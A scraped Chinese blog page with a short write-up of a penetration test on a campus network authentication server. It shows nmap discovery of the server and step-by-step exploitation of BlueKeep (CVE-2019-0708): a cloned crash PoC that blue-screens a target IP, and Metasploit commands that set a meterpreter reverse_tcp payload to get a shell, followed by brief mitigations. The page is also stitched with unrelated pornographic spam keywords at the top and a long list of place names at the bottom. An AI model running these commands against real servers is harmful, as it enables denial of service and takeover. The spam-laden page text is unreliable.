五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

記一次校園網(wǎng)滲透測(cè)試

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:發(fā)文前已將漏洞反饋至校園信息中心,菜雞投稿,如有不對(duì)的地方還請(qǐng)各位大佬指正

設(shè)備連接校園網(wǎng)跳轉(zhuǎn)到了銳捷校園網(wǎng)認(rèn)證界面

得到校園網(wǎng)服務(wù)器地址:10.25.254.11

通過(guò)nmap工具掃描端口發(fā)現(xiàn)以下端口開放

發(fā)現(xiàn)服務(wù)器的3389端口開放,推測(cè)3389端口可能存在 cve-2019-0708漏洞

利用msf工具進(jìn)行掃描,發(fā)現(xiàn)服務(wù)器確實(shí)存在該漏洞,通過(guò)該漏洞我們可以獲取服務(wù)器控制權(quán)或?qū)Ψ?wù)器發(fā)起藍(lán)屏攻擊,使服務(wù)器癱瘓,或獲取服務(wù)器shell。

1.對(duì)服務(wù)器發(fā)動(dòng)藍(lán)屏攻擊(本次攻擊未攻擊校園網(wǎng)服務(wù)器,搭建了相同環(huán)境的靶機(jī)進(jìn)行測(cè)試)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下載完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目標(biāo)ip

運(yùn)行工具后靶機(jī)藍(lán)屏

2.利用該漏洞獲取目標(biāo)shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模塊

輸入命令use?exploit/windows/rdp/cve_2019_0708_bluekeep_rce


設(shè)置目標(biāo):輸入命令set rhosts 192.168.1.108

使用payload:輸入命令set payload windows/x64/meterpreter/reverse_tcp

設(shè)置主機(jī)架構(gòu):set target 2


執(zhí)行,獲取服務(wù)器shell

獲取服務(wù)器shell后就可以為所欲為了,校園網(wǎng)認(rèn)證服務(wù)器開放的其它端口也存在一些漏洞,目前已將漏洞反饋至校園信息中心,本次滲透未影響服務(wù)器正常運(yùn)行


解決方案:

1.在運(yùn)行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系統(tǒng)上啟用網(wǎng)絡(luò)級(jí)身份驗(yàn)證 (NLA)

2.在企業(yè)邊界防火墻處阻止 TCP 端口 3389


記一次校園網(wǎng)滲透測(cè)試的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
乌兰察布市| 铜陵市| 郴州市| 安溪县| 安顺市| 石嘴山市| 光山县| 新巴尔虎左旗| 武冈市| 清丰县| 蓝田县| 定边县| 彩票| 辽源市| 施秉县| 酉阳| 宁城县| 临颍县| 井冈山市| 崇仁县| 成安县| 商水县| 甘泉县| 库伦旗| 武冈市| 罗江县| 宁城县| 嘉义市| 于都县| 望谟县| 将乐县| 东源县| 荣昌县| 孟津县| 吴桥县| 商城县| 白山市| 曲松县| 洛扎县| 多伦县| 辽中县|